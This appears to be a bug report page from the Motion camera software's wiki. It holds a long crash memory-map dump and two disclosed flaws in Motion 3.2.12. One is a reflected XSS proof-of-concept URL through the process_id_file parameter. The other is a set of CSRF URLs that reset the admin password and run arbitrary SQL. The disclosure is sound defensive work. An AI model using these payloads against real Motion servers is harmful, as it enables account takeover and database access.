b5f6e000-b5f6f000 rw-p 00014000 08:11 12719668   /lib/i386-linux-gnu/libresolv-2.15.so
b5f6f000-b5f72000 rw-p 00000000 00:00 0
b5f72000-b5f74000 r-xp 00000000 08:11 12714027   /lib/i386-linux-gnu/libkeyutils.so.1.4
b5f74000-b5f75000 r--p 00002000 08:11 12714027   /lib/i386-linux-gnu/libkeyutils.so.1.4
b5f75000-b5f76000 rw-p 00003000 08:11 12714027   /lib/i386-linux-gnu/libkeyutils.so.1.4
b5f76000-b5f7d000 r-xp 00000000 08:11 13108893   /usr/lib/i386-linux-gnu/libkrb5support.so.0.1
b5f7d000-b5f7e000 r--p 00006000 08:11 13108893   /usr/lib/i386-linux-gnu/libkrb5support.so.0.1
b5f7e000-b5f7f000 rw-p 00007000 08:11 13108893   /usr/lib/i386-linux-gnu/libkrb5support.so.0.1
b5f7f000-b5fa5000 r-xp 00000000 08:11 13108889   /usr/lib/i386-linux-gnu/libk5crypto.so.3.1
b5fa5000-b5fa6000 r--p 00025000 08:11 13108889   /usr/lib/i386-linux-gnu/libk5crypto.so.3.1
b5fa6000-b5fa7000 rw-p 00026000 08:11 13108889   /usr/lib/i386-linux-gnu/libk5crypto.so.3.1
b5fa7000-b5faa000 r-xp 00000000 08:11 12719678   /lib/i386-linux-gnu/libdl-2.15.so
b5faa000-b5fab000 r--p 00002000 08:11 12719678   /lib/i386-linux-gnu/libdl-2.15.so
b5fab000-b5fac000 rw-p 00003000 08:11 12719678   /lib/i386-linux-gnu/libdl-2.15.so
b5fac000-b5fc8000 r-xp 00000000 08:11 12714074   /lib/i386-linux-gnu/libgcc_s.so.1
b5fc8000-b5fc9000 r--p 0001b000 08:11 12714074   /lib/i386-linux-gnu/libgcc_s.so.1
b5fc9000-b5fca000 rw-p 0001c000 08:11 12714074   /lib/i386-linux-gnu/libgcc_s.so.1
b5fca000-b5fcb000 rw-p 00000000 00:00 0
b5fcb000-b6056000 r-xp 00000000 08:11 13109480   /usr/lib/i386-linux-gnu/liborc-0.4.so.0.16.0
b6056000-b6057000 r--p 0008a000 08:11 13109480   /usr/lib/i386-linux-gnu/liborc-0.4.so.0.16.0
b6057000-b605b000 rw-p 0008b000 08:11 13109480   /usr/lib/i386-linux-gnu/liborc-0.4.so.0.16.0
b605b000-b6061000 r-xp 00000000 08:11 13111258   /usr/lib/i386-linux-gnu/libogg.so.0.7.1
b6061000-b6062000 r--p 00005000 08:11 13111258   /usr/lib/i386-linux-gnu/libogg.so.0.7.1
b6062000-b6063000 rw-p 00006000 08:11 13111258   /usr/lib/i386-linux-gnu/libogg.so.0.7.1
b6063000-b60b1000 r-xp 00000000 08:11 13107929   /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b60b1000-b60b2000 ---p 0004e000 08:11 13107929   /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b60b2000-b60b3000 r--p 0004e000 08:11 13107929   /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b60b3000-b60b4000 rw-p 0004f000 08:11 13107929   /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b60b4000-b60b5000 rw-p 00000000 00:00 0
b60b5000-b60f0000 r-xp 00000000 08:11 13107517   /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b60f0000-b60f1000 ---p 0003b000 08:11 13107517   /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b60f1000-b60f2000 r--p 0003b000 08:11 13107517   /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b60f2000-b60f3000 rw-p 0003c000 08:11 13107517   /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b60f3000-b60f6000 r-xp 00000000 08:11 12714018   /lib/i386-linux-gnu/libcom_err.so.2.1
b60f6000-b60f7000 r--p 00002000 08:11 12714018   /lib/i386-linux-gnu/libcom_err.so.2.1
b60f7000-b60f8000 rw-p 00003000 08:11 12714018   /lib/i386-linux-gnu/libcom_err.so.2.1
b60f8000-b60f9000 rw-p 00000000 00:00 0
b60f9000-b61c1000 r-xp 00000000 08:11 13108891   /usr/lib/i386-linux-gnu/libkrb5.so.3.3
b61c1000-b61c7000 r--p 000c7000 08:11 13108891   /usr/lib/i386-linux-gnu/libkrb5.so.3.3
b61c7000-b61c8000 rw-p 000cd000 08:11 13108891   /usr/lib/i386-linux-gnu/libkrb5.so.3.3
b61c8000-b635a000 r-xp 00000000 08:11 12714013   /lib/i386-linux-gnu/libcrypto.so.1.0.0
b635a000-b6369000 r--p 00192000 08:11 12714013   /lib/i386-linux-gnu/libcrypto.so.1.0.0
b6369000-b6370000 rw-p 001a1000 08:11 12714013   /lib/i386-linux-gnu/libcrypto.so.1.0.0
b6370000-b6373000 rw-p 00000000 00:00 0
b6373000-b63c2000 r-xp 00000000 08:11 12714014   /lib/i386-linux-gnu/libssl.so.1.0.0
b63c2000-b63c3000 ---p 0004f000 08:11 12714014   /lib/i386-linux-gnu/libssl.so.1.0.0
b63c3000-b63c5000 r--p 0004f000 08:11 12714014   /lib/i386-linux-gnu/libssl.so.1.0.0
b63c5000-b63c9000 rw-p 00051000 08:11 12714014   /lib/i386-linux-gnu/libssl.so.1.0.0
b63c9000-b63d9000 r-xp 00000000 08:11 13107507   /usr/lib/i386-linux-gnu/libva.so.1.3200.0
b63d9000-b63da000 r--p 0000f000 08:11 13107507   /usr/lib/i386-linux-gnu/libva.so.1.3200.0
b63da000-b63db000 rw-p 00010000 08:11 13107507   /usr/lib/i386-linux-gnu/libva.so.1.3200.0
b63db000-b63df000 rw-p 00000000 00:00 0
b63df000-b63eb000 r-xp 00000000 08:11 13107504   /usr/lib/libgsm.so.1.0.12
b63eb000-b63ec000 r--p 0000b000 08:11 13107504   /usr/lib/libgsm.so.1.0.12
b63ec000-b63ed000 rw-p 0000c000 08:11 13107504   /usr/lib/libgsm.so.1.0.12
b63ed000-b63ee000 rw-p 00000000 00:00 0
b63ee000-b64a9000 r-xp 00000000 08:11 13107498   /usr/lib/libschroedinger-1.0.so.0.11.0
b64a9000-b64ab000 r--p 000ba000 08:11 13107498   /usr/lib/libschroedinger-1.0.so.0.11.0
b64ab000-b64ac000 rw-p 000bc000 08:11 13107498   /usr/lib/libschroedinger-1.0.so.0.11.0
b64ac000-b64cb000 r-xp 00000000 08:11 13109963   /usr/lib/i386-linux-gnu/sse2/libspeex.so.1.5.0
b64cb000-b64cc000 r--p 0001e000 08:11 13109963   /usr/lib/i386-linux-gnu/sse2/libspeex.so.1.5.0
b64cc000-b64cd000 rw-p 0001f000 08:11 13109963   /usr/lib/i386-linux-gnu/sse2/libspeex.so.1.5.0
b64cd000-b64e8000 r-xp 00000000 08:11 13110244   /usr/lib/i386-linux-gnu/libtheoradec.so.1.1.4
b64e8000-b64e9000 r--p 0001a000 08:11 13110244   /usr/lib/i386-linux-gnu/libtheoradec.so.1.1.4
b64e9000-b64ea000 rw-p 0001b000 08:11 13110244   /usr/lib/i386-linux-gnu/libtheoradec.so.1.1.4
b64ea000-b6529000 r-xp 00000000 08:11 13110245   /usr/lib/i386-linux-gnu/libtheoraenc.so.1.1.2
b6529000-b652a000 r--p 0003f000 08:11 13110245   /usr/lib/i386-linux-gnu/libtheoraenc.so.1.1.2
b652a000-b652b000 rw-p 00040000 08:11 13110245   /usr/lib/i386-linux-gnu/libtheoraenc.so.1.1.2
b652b000-b6554000 r-xp 00000000 08:11 13109670   /usr/lib/i386-linux-gnu/libvorbis.so.0.4.5
b6554000-b6555000 r--p 00028000 08:11 13109670   /usr/lib/i386-linux-gnu/libvorbis.so.0.4.5
b6555000-b6556000 rw-p 00029000 08:11 13109670   /usr/lib/i386-linux-gnu/libvorbis.so.0.4.5
b6556000-b6557000 rw-p 00000000 00:00 0
b6557000-b66bd000 r-xp 00000000 08:11 13109643   /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.8
b66bd000-b66ce000 r--p 00165000 08:11 13109643   /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.8
b66ce000-b66cf000 rw-p 00176000 08:11 13109643   /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.8
b66cf000-b676b000 r-xp 00000000 08:11 13110019   /usr/lib/libvpx.so.1.0.0
b676b000-b676c000 r--p 0009c000 08:11 13110019   /usr/lib/libvpx.so.1.0.0
b676c000-b676d000 rw-p 0009d000 08:11 13110019   /usr/lib/libvpx.so.1.0.0
b676d000-b6777000 rw-p 00000000 00:00 0
b6777000-b678b000 r-xp 00000000 08:11 12714015   /lib/i386-linux-gnu/libz.so.1.2.3.4
b678b000-b678c000 r--p 00013000 08:11 12714015   /lib/i386-linux-gnu/libz.so.1.2.3.4
b678c000-b678d000 rw-p 00014000 08:11 12714015   /lib/i386-linux-gnu/libz.so.1.2.3.4
b678d000-b679c000 r-xp 00000000 08:11 12714930   /lib/i386-linux-gnu/libbz2.so.1.0.4
b679c000-b679d000 r--p 0000e000 08:11 12714930   /lib/i386-linux-gnu/libbz2.so.1.0.4
b679d000-b679e000 rw-p 0000f000 08:11 12714930   /lib/i386-linux-gnu/libbz2.so.1.0.4
b679e000-b67c8000 r-xp 00000000 08:11 12719674   /lib/i386-linux-gnu/libm-2.15.so
b67c8000-b67c9000 r--p 00029000 08:11 12719674   /lib/i386-linux-gnu/libm-2.15.so
b67c9000-b67ca000 rw-p 0002a000 08:11 12719674   /lib/i386-linux-gnu/libm-2.15.so
b67ca000-b67cb000 rw-p 00000000 00:00 0
b67cb000-b696e000 r-xp 00000000 08:11 12719663   /lib/i386-linux-gnu/libc-2.15.so
b696e000-b696f000 ---p 001a3000 08:11 12719663   /lib/i386-linux-gnu/libc-2.15.so
b696f000-b6971000 r--p 001a3000 08:11 12719663   /lib/i386-linux-gnu/libc-2.15.so
b6971000-b6972000 rw-p 001a5000 08:11 12719663   /lib/i386-linux-gnu/libc-2.15.so
b6972000-b6975000 rw-p 00000000 00:00 0
b6975000-b699c000 r-xp 00000000 08:11 13107298   /usr/lib/libpq.so.5.4
b699c000-b699d000 r--p 00027000 08:11 13107298   /usr/lib/libpq.so.5.4
b699d000-b699e000 rw-p 00028000 08:11 13107298   /usr/lib/libpq.so.5.4
b699e000-b69bb000 r-xp 00000000 08:11 13241057   /usr/lib/i386-linux-gnu/i686/cmov/libavutil.so.51.22.1
b69bb000-b69bc000 r--p 0001c000 08:11 13241057   /usr/lib/i386-linux-gnu/i686/cmov/libavutil.so.51.22.1
b69bc000-b69bd000 rw-p 0001d000 08:11 13241057   /usr/lib/i386-linux-gnu/i686/cmov/libavutil.so.51.22.1
b69bd000-b69c0000 rw-p 00000000 00:00 0
b69c0000-b709e000 r-xp 00000000 08:11 13243408   /usr/lib/i386-linux-gnu/i686/cmov/libavcodec.so.53.35.0
b709e000-b709f000 r--p 006de000 08:11 13243408   /usr/lib/i386-linux-gnu/i686/cmov/libavcodec.so.53.35.0
b709f000-b70ae000 rw-p 006df000 08:11 13243408   /usr/lib/i386-linux-gnu/i686/cmov/libavcodec.so.53.35.0
b70ae000-b761c000 rw-p 00000000 00:00 0
b761c000-b7729000 r-xp 00000000 08:11 13243406   /usr/lib/i386-linux-gnu/i686/cmov/libavformat.so.53.21.1
b7729000-b772a000 r--p 0010c000 08:11 13243406   /usr/lib/i386-linux-gnu/i686/cmov/libavformat.so.53.21.1
b772a000-b7732000 rw-p 0010d000 08:11 13243406   /usr/lib/i386-linux-gnu/i686/cmov/libavformat.so.53.21.1
b7732000-b7733000 rw-p 00000000 00:00 0
b7733000-b7755000 r-xp 00000000 08:11 13108788   /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0
b7755000-b7756000 r--p 00022000 08:11 13108788   /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0
b7756000-b7757000 rw-p 00023000 08:11 13108788   /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0
b7757000-b776e000 r-xp 00000000 08:11 12719672   /lib/i386-linux-gnu/libpthread-2.15.so
b776e000-b776f000 r--p 00016000 08:11 12719672   /lib/i386-linux-gnu/libpthread-2.15.so
b776f000-b7770000 rw-p 00017000 08:11 12719672   /lib/i386-linux-gnu/libpthread-2.15.so
b7770000-b7772000 rw-p 00000000 00:00 0
b777f000-b7782000 rw-p 00000000 00:00 0
b7782000-b7783000 r-xp 00000000 00:00 0          [vdso]
b7783000-b77a3000 r-xp 00000000 08:11 12719675   /lib/i386-linux-gnu/ld-2.15.so
b77a3000-b77a4000 r--p 0001f000 08:11 12719675   /lib/i386-linux-gnu/ld-2.15.so
b77a4000-b77a5000 rw-p 00020000 08:11 12719675   /lib/i386-linux-gnu/ld-2.15.so
bfebf000-bfee1000 rw-p 00000000 00:00 0          [stack]
Aborted


Cross Site Scripting vulnerability:

It's possible to execute script code on the client-side browser through the "process_id_file" parameter.
The following Proof of Concept url will display a popup with the text XSS:

http://<IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li>

Solution: Sanitise user input values


Cross Site Request Forgery:

The following urls show that it&#39;s possible to reset a password, change the SQL query by sending a complete URL to the victim. If the victim clicks on the url, it will execute the command without any further checking.
http://<IP>:<PORT>/0/config/set?control_authentication=admin:mypassword (Set admin password)
http://<IP>:<PORT>/0/config/set?sql_query=SELECT%20user() (Arbitrary SQL query)

See the following URL for more information on CSRF and solutions: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Environment

Motion version: 3.2.12
ffmpeg version:  
Shared libraries: ffmpeg
Server OS: Ubuntu 12.04
-- RvH - 07 Mar 2013

Follow up

A fix for this is currently being pursued.

Fix record

Topic revision: r2 - 10 Oct 2014, MrDave
Copyright © 1999-2024 by the contributing authors. All material on this collaboration platform is the property of the contributing authors.
Please do not email Kenneth for support questions (read why). Use the Support Requests page or join the Mailing List.
This website only use harmless session cookies. See Cookie Policy for details. By using this website you accept the use of these cookies.